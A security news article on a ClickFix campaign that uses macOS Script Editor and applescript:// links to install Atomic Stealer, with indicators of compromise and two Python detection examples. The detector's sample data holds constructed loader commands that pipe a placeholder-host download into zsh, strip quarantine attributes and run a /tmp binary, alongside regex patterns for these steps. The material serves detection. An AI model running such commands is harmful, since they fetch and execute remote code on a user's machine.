Researchers have uncovered a sophisticated ClickFix-style attack targeting macOS users that ditches the conventional Terminal execution path entirely, instead weaponizing macOS Script Editor via the applescript:// URL scheme to silently deliver the Atomic Stealer infostealer. The campaign exposes the limits of Apple’s recently introduced Terminal safeguards.
Familiar Attack and New Execution
ClickFix is a well-established social engineering technique that manipulates users into copying and pasting malicious shell commands into Terminal under the pretense of routine system maintenance or troubleshooting.
Its growing success prompted Apple to act: in macOS Tahoe 26.4, the company quietly introduced a Terminal-level security feature that scans and delays the execution of pasted commands, warning users of potential harm before anything runs. The warning message reads, “Possible malware, paste blocked. Your Mac has not been harmed.”
For a brief moment, it seemed like a meaningful win for defenders. But attackers adapted almost immediately.
Researchers identified a new ClickFix variant through one of their behavioral detection mechanisms, which flagged Script Editor-based execution as suspicious runtime activity.
Rather than abandoning the ClickFix template, threat actors simply relocated the execution point, swapping Terminal for Script Editor, a native macOS application pre-installed on every Mac and designed for running AppleScript and JXA (JavaScript for Automation) code.
Script Editor’s trusted status in macOS makes it an ideal vehicle for abuse, and its history as a malware delivery mechanism is well documented.
Fake Apple Disk Cleanup Page
The infection chain begins with a convincing, Apple-branded webpage masquerading as a disk space optimization utility. The page presents users with a series of step-by-step instructions that closely mirror legitimate macOS maintenance guidance, complete with polished UI elements designed to earn the victim’s trust.
When the user clicks the “Execute” button on the page, the site silently triggers an embedded applescript:// URL. The URL scheme is a browser-level mechanism that requests permission to open Script Editor directly.
The browser surfaces a standard permission dialog asking whether to allow Script Editor to open, which most users interpret as a routine system prompt rather than a threat indicator.
Once approved, Script Editor launches with a pre-populated script that carries fake copyright headers falsely attributing the code to Apple Inc., deepening the illusion of legitimacy.
This approach is notably more streamlined than traditional ClickFix: the user is never asked to open Terminal or type commands manually; they are simply guided from a webpage into an already-prepared execution environment.
Obfuscated Execution and Multi-Stage Payload Delivery
Once the user runs the pre-filled script in Script Editor, the attack chain unfolds in carefully staged steps.
The initial script executes a curl command obfuscated using the Unix tr utility, which performs character translation at runtime to reconstruct a valid URL from a scrambled string. This obfuscation pattern has been observed across multiple newer variants of the campaign.
The decoded command reaches out to dryvecar[.]com to retrieve a second-stage payload using the -k flag to turn off TLS certificate validation, allowing the operation to proceed over untrusted or potentially intercepted infrastructure. Critically, the downloaded content is executed directly in memory via a pipe to zsh, leaving no file written to disk during this phase.
The second-stage payload is wrapped in base64 encoding and gzip compression, adding another layer of obfuscation before execution.
Once decoded, it downloads a Mach-O binary identified as a recent variant of Atomic Stealer (AMOS) to /tmp/helper, strips extended attributes to bypass Gatekeeper checks, sets execution permissions, and runs the binary.
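The staged chain described above leaves a recognizable footprint in process command-line telemetry: a tr translation feeding a URL into curl, the -k flag, a download piped straight into zsh, a base64-plus-gzip unwrap, an xattr call that strips the quarantine attribute, and a binary made executable and launched from /tmp. The following detection heuristic is an added example written for this article, not code from Jamf or from the campaign; the command lines it scans are constructed stand-ins (example.invalid is a placeholder host, and the tr call is a trivial case-fold rather than the real scrambling), and the indicator names and scoring thresholds are this example's own choices.

```python
"""Heuristic scoring of shell command lines for the ClickFix-style loader
chain: tr-based URL reconstruction, curl -k piped into a shell, base64+gzip
unwrapping, quarantine-attribute stripping and execution from /tmp.
Example code written for the article, not Jamf's or the campaign's own."""
import re

# Each indicator is (name, compiled regex). The patterns are deliberately
# loose: they surface candidates for analyst review, not verdicts.
INDICATORS = [
    # A string rebuilt by tr inside $( ... ) or piped onward to a fetcher/shell.
    ("tr_decoded_string",
     re.compile(r"\$\([^)]*\btr\b[^)]*\)|\btr\b[^|;]*\|\s*(?:curl|wget|zsh|bash|sh)\b")),
    # curl with certificate validation turned off (-k / --insecure).
    ("curl_insecure_tls",
     re.compile(r"\bcurl\b[^|;]*\s(?:-[a-zA-Z]*k|--insecure)(?=\s|$)")),
    # Downloaded content executed directly by a shell, nothing written to disk.
    ("download_piped_to_shell",
     re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:zsh|bash|sh)\b")),
    # base64 decode combined with gzip decompression, in either order.
    ("base64_gzip_unwrap",
     re.compile(r"base64\s+(?:-[dD]|--decode)\b.*?\|\s*(?:gunzip|gzip\s+-d|zcat)\b"
                r"|(?:gunzip|gzip\s+-d|zcat)\b.*?\|\s*base64\s+(?:-[dD]|--decode)")),
    # Extended attributes cleared (xattr -c) or the quarantine flag removed.
    ("quarantine_xattr_strip",
     re.compile(r"\bxattr\s+(?:-[a-z]*c[a-z]*|-d\s+com\.apple\.quarantine)\b")),
    # A file under /tmp made executable or launched directly.
    ("tmp_binary_exec",
     re.compile(r"chmod\s+(?:\+x|[0-7]{3,4})\s+/tmp/\S+|(?:^|[;&|]\s*)/tmp/\S+")),
]


def score_command(cmd: str) -> dict:
    """Return the indicator names that fire on one command line plus a verdict:
    'suspicious' at two or more hits, 'review' at one hit, otherwise 'clean'."""
    hits = [name for name, rx in INDICATORS if rx.search(cmd)]
    verdict = "suspicious" if len(hits) >= 2 else "review" if hits else "clean"
    return {"hits": hits, "verdict": verdict}


# Constructed sample command lines (not captured from the campaign).
SAMPLE_COMMANDS = {
    # Stand-in for the stage-1 loader: URL rebuilt by tr, TLS checks off,
    # response piped straight into zsh. The tr call here only case-folds.
    "stage1": "curl -k -s \"$(echo EXAMPLE.INVALID/STAGE | tr 'A-Z' 'a-z')\" | zsh",
    # Stand-in for the stage-2 unwrap-and-run step and the /tmp drop.
    "stage2": ("echo H4sI... | base64 -d | gunzip | zsh; "
               "curl -k -o /tmp/helper https://example.invalid/bin "
               "&& xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper"),
    # Benign administration that also uses curl and a pipe.
    "benign": "curl -fsSL https://example.invalid/release.txt | head -n 1",
}


def scan_samples() -> dict:
    """Score every constructed sample; returns {label: verdict}."""
    return {label: score_command(cmd)["verdict"] for label, cmd in SAMPLE_COMMANDS.items()}


if __name__ == "__main__":
    for label, cmd in SAMPLE_COMMANDS.items():
        print(label, score_command(cmd))
```

The two-hit threshold is the point of the design: any single indicator (curl -k, a pipe into a shell, a chmod under /tmp) is common enough in legitimate administration to be noisy on its own, whereas the combination is what characterises this loader. Tune the threshold and the process scope (for example, limiting the scan to command lines whose ancestry includes Script Editor or osascript) to the noise level of your own fleet.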
Atomic Stealer is a macOS-specific infostealer and backdoor that can harvest credentials, browser data, crypto wallets, and sensitive system information.
macOS Version Behavior Differences
Researchers noted that Script Editor’s behavior varies across macOS versions. On macOS Tahoe 26.4, an additional warning prompt is presented, requiring users to explicitly allow the script to be saved to disk before execution, adding a small but meaningful layer of friction.
Earlier macOS versions did not include this prompt, meaning the attack can execute with less user interaction on unpatched systems.
This version-dependent behavior underscores the importance of keeping macOS updated, even as it highlights that security prompts alone are insufficient deterrents against determined social engineering campaigns.
Arms Race in Full Motion
ClickFix activity surged by more than 500% in the first half of 2025, making it the second-most common attack vector after phishing, according to ESET. Apple’s Terminal warning was a direct response to this trend, but as this campaign illustrates, when one door closes, attackers immediately locate another.
The shift from Terminal to Script Editor is a small technical adjustment with outsized implications. It preserves the core ClickFix social engineering logic while evading the latest host-based controls, and it can be triggered entirely via a URL scheme with minimal user interaction.
Jamf Threat Labs continues to monitor the campaign’s infrastructure and track emerging variants. Organizations using Jamf Protect can configure Threat Prevention, Advanced Threat Controls, and Web Protection features to block and report similar threats.
Security teams are advised to monitor for unexpected applescript:// URL scheme invocations from browser processes and enforce application allow-listing policies that restrict Script Editor usage in enterprise environments.
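The two signals recommended here, a browser invoking the applescript:// scheme and Script Editor starting on the back of it, can be expressed as simple rules over endpoint telemetry. The code below is an added example written for this article, not Jamf Protect's detection logic; the event schema (ts, type, process, parent, responsible, user, url), the browser list, the 30-second correlation window and the allow-list policy are all this example's assumptions, and the event stream it runs on is constructed. Because macOS launches a URL-scheme handler through launchd rather than as a direct child of the browser, the rules look at a "responsible" process attribute where the sensor reports one and otherwise fall back to time correlation with the scheme open.

```python
"""Detection rules for browser-initiated applescript:// opens and Script
Editor / osascript launches tied to a browser, with an optional Script Editor
allow-list. Example code written for the article; the event schema is an
assumption, not any product's telemetry format."""
from datetime import datetime, timedelta
from urllib.parse import urlsplit

BROWSERS = {"Safari", "Google Chrome", "Firefox", "Microsoft Edge", "Arc", "Brave Browser"}
SCRIPT_RUNNERS = {"Script Editor", "osascript"}
CORRELATION_WINDOW = timedelta(seconds=30)  # assumed window between scheme open and exec


def _ts(ev: dict) -> datetime:
    return datetime.fromisoformat(ev["ts"])


def detect(events: list, allowed_users=frozenset()) -> list:
    """Return alert dicts for an event stream.

    Assumed event fields: 'ts' (ISO 8601), 'type' ('url_open' or 'process_exec'),
    'process' (image name), 'user'; url_open events carry 'url', process_exec
    events carry 'parent' and, where the sensor reports it, 'responsible'.
    allowed_users lists accounts permitted to run Script Editor; empty means
    no allow-list policy is enforced.
    """
    alerts = []
    scheme_opens = []  # browser applescript:// opens kept for correlation
    for ev in sorted(events, key=_ts):
        if ev["type"] == "url_open":
            scheme = urlsplit(ev["url"]).scheme.lower()
            if scheme == "applescript" and ev["process"] in BROWSERS:
                scheme_opens.append(ev)
                alerts.append({"rule": "browser_applescript_scheme", "ts": ev["ts"],
                               "process": ev["process"], "user": ev.get("user")})
        elif ev["type"] == "process_exec" and ev["process"] in SCRIPT_RUNNERS:
            lineage = {ev.get("parent"), ev.get("responsible")} & BROWSERS
            if lineage:
                alerts.append({"rule": "script_runner_from_browser", "ts": ev["ts"],
                               "process": ev["process"], "via": sorted(lineage)[0],
                               "user": ev.get("user")})
            else:
                # No browser lineage reported: fall back to "Script Editor started
                # shortly after a browser opened applescript://".
                recent = [o for o in scheme_opens
                          if timedelta(0) <= _ts(ev) - _ts(o) <= CORRELATION_WINDOW]
                if recent:
                    alerts.append({"rule": "script_runner_after_scheme_open", "ts": ev["ts"],
                                   "process": ev["process"], "via": recent[-1]["process"],
                                   "user": ev.get("user")})
            # Allow-list policy applies to the Script Editor app only; osascript is
            # used by many legitimate management tools and would be too noisy.
            if allowed_users and ev["process"] == "Script Editor" \
                    and ev.get("user") not in allowed_users:
                alerts.append({"rule": "script_editor_allowlist_violation", "ts": ev["ts"],
                               "process": ev["process"], "user": ev.get("user")})
    return alerts


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    # A page in Safari triggers the scheme; the URL body is a placeholder.
    {"ts": "2025-07-01T10:00:00", "type": "url_open", "process": "Safari",
     "user": "alice", "url": "applescript://placeholder"},
    # Script Editor starts seconds later; launchd is the parent but the sensor
    # attributes responsibility to Safari.
    {"ts": "2025-07-01T10:00:04", "type": "process_exec", "process": "Script Editor",
     "parent": "launchd", "responsible": "Safari", "user": "alice"},
    # Benign: a management agent (placeholder name) running osascript.
    {"ts": "2025-07-01T11:30:00", "type": "process_exec", "process": "osascript",
     "parent": "mdm-agent", "responsible": "mdm-agent", "user": "root"},
    # Benign: ordinary https navigation.
    {"ts": "2025-07-01T11:31:00", "type": "url_open", "process": "Google Chrome",
     "user": "bob", "url": "https://example.invalid/docs"},
    # Benign: a developer on the allow-list opens Script Editor from the Dock.
    {"ts": "2025-07-01T12:00:00", "type": "process_exec", "process": "Script Editor",
     "parent": "launchd", "responsible": "Dock", "user": "dev"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS, allowed_users={"dev"}):
        print(alert)
```

Run against the constructed stream, the rules raise three alerts for alice's session (the scheme open, the browser-attributed Script Editor launch, and the allow-list violation) and nothing for the management agent, the normal navigation or the allow-listed developer. The correlation fallback matters on sensors that do not expose a responsible-process attribute: there the Script Editor launch would otherwise look like an ordinary launchd child.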
Indicators of Compromise
- Domain: dryvecar[.]com
- Payload path: /curl/04566d1d3f9717b2e7e6b643775d9ca72cef942f6df9ce075cf8c73a1bd2565a
- Second-stage path: /cleaner3/update
- Dropped binary: /tmp/helper (Atomic Stealer Mach-O)
FAQ
Q1: What is the ClickFix attack technique?
ClickFix is a social engineering method that tricks users into pasting and executing malicious commands under the guise of system troubleshooting or maintenance.
Q2: Why did attackers switch from Terminal to Script Editor?
Apple’s macOS Tahoe 26.4 introduced Terminal paste warnings that block suspicious commands, prompting attackers to pivot to Script Editor as an unprotected execution vector.
Q3: What does Atomic Stealer do once installed on a Mac?
Atomic Stealer harvests credentials, browser data, cryptocurrency wallets, and other sensitive information from compromised macOS systems.
Q4: How can users protect themselves from this Script Editor-based ClickFix attack?
Users should avoid clicking “Execute” buttons on unfamiliar web pages and keep macOS up to date, and enterprises should deploy endpoint security tools like Jamf Protect.
Site: thecybrdef.com